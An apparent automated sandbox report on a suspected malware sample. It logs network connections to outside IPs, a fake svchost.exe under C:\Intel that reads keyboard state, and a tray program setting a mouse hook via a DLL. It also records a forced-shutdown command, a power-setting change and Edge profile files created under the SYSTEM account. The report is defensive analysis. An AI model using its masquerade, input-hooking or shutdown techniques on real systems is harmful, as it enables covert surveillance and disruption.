    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55829
    Source: unknownNetwork traffic detected: HTTP traffic on port 59997 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52559
    Source: unknownNetwork traffic detected: HTTP traffic on port 62695 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49420
    Source: unknownNetwork traffic detected: HTTP traffic on port 64664 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54183 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54856
    Source: unknownNetwork traffic detected: HTTP traffic on port 60768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53665 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 53258 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60058
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54183
    Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60513 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54228 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52161
    Source: unknownNetwork traffic detected: HTTP traffic on port 52371 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58227 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64133
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62750
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61267
    Source: unknownNetwork traffic detected: HTTP traffic on port 63674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
    Source: unknownNetwork traffic detected: HTTP traffic on port 60058 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 62304 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 59134 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57085 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53133
    Source: unknownNetwork traffic detected: HTTP traffic on port 59765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 52471 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63255 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59997
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54228
    Source: unknownNetwork traffic detected: HTTP traffic on port 63290 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53258
    Source: unknownNetwork traffic detected: HTTP traffic on port 62279 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53380
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59765
    Source: unknownNetwork traffic detected: HTTP traffic on port 58637 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 61880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59486
    Source: unknownNetwork traffic detected: HTTP traffic on port 63597 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63297
    Source: unknownNetwork traffic detected: HTTP traffic on port 54710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 60866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62880
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64664
    Source: unknownNetwork traffic detected: HTTP traffic on port 50713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60866
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63457
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 58604 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50559
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61052
    Source: unknownNetwork traffic detected: HTTP traffic on port 64133 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54685 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 51950 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53665
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53302
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61964
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58048
    Source: unknownNetwork traffic detected: HTTP traffic on port 61072 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59134
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60513
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64557
    Source: unknownNetwork traffic detected: HTTP traffic on port 53133 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 61086 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58604
    Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57238
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62304
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63999
    Source: unknownNetwork traffic detected: HTTP traffic on port 53719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58970
    Source: unknownNetwork traffic detected: HTTP traffic on port 61964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64969
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61614
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64605
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52471
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57085
    Source: unknownNetwork traffic detected: HTTP traffic on port 50590 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64609
    Source: unknownNetwork traffic detected: HTTP traffic on port 64527 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63597
    Source: unknownNetwork traffic detected: HTTP traffic on port 64609 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 64886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60768
    Source: unknownHTTPS traffic detected: 57.129.37.157:443 -> 192.168.11.20:49761 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 57.129.37.157:443 -> 192.168.11.20:49763 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 160.202.165.71:443 -> 192.168.11.20:49766 version: TLS 1.2
    Source: C:\Intel\svchost.exeCode function: 42_2_03E38D00 GetKeyState,GetKeyboardState,42_2_03E38D00
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: DirectDrawCreateExmemstr_580119ce-d
    Source: C:\Intel\Trays\Trays.exeWindows user hook set: 0 mouse C:\Intel\Trays\ShellEh6055.dll
    Source: svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: GetRawInputDatamemstr_fc39d36e-6

    System Summary

    barindex
    Uses powercfg.exe to modify the power settings
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
    Uses shutdown.exe to shutdown or reboot the system
    Source: unknownProcess created: C:\Windows\System32\shutdown.exe C:\Windows\system32\shutdown.EXE /s /f /t 0
    Source: C:\Intel\svchost.exeCode function: 42_2_03E3A4B6 NtdllDefWindowProc_A,42_2_03E3A4B6
    Source: C:\Intel\svchost.exeCode function: 42_2_03E3A4B8 NtdllDefWindowProc_A,42_2_03E3A4B8
    Source: C:\Intel\svchost.exeCode function: 44_2_03E3A4B6 NtdllDefWindowProc_A,44_2_03E3A4B6
    Source: C:\Intel\svchost.exeCode function: 44_2_03E3A4B8 NtdllDefWindowProc_A,44_2_03E3A4B8
    Source: C:\Intel\svchost.exeCode function: 45_2_03E3A4B6 NtdllDefWindowProc_A,45_2_03E3A4B6
    Source: C:\Intel\svchost.exeCode function: 45_2_03E3A4B8 NtdllDefWindowProc_A,45_2_03E3A4B8
    Source: C:\Intel\driver.exeCode function: 40_2_00404B5C: CreateFileW,DeviceIoControl,CloseHandle,40_2_00404B5C
    Source: C:\Intel\driver.exeCode function: 40_2_0040C734 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,40_2_0040C734
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6782159F-1D6C.pma
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\cache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\download_cache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\warnStateCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\lockfile
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Last Version
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\README
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_2
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\History
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Web Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Favicons
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Favicons-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\5c07473f-281c-45cb-bea7-aab2092a1778.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Safe Browsing
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\First Run
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\FirstLaunchAfterInstallation
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\8097023c-d1dd-4803-b7e9-55bb1d2582a4.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_638343870221005468
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\75387db4-416b-4965-9d86-de9deab1a890.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico~RF1f90a0.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\b04a53e9-e829-40a2-bd2d-80571496c6a2.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\3c2ef124-1048-4984-9f26-ddfeb12ce27d.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_2
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Speech Recognition
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\OriginTrials
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Subresource Filter
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Edge Shopping
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\WidevineCdm
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State~RF1f912d.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sessions
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic_638004170464094982
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir
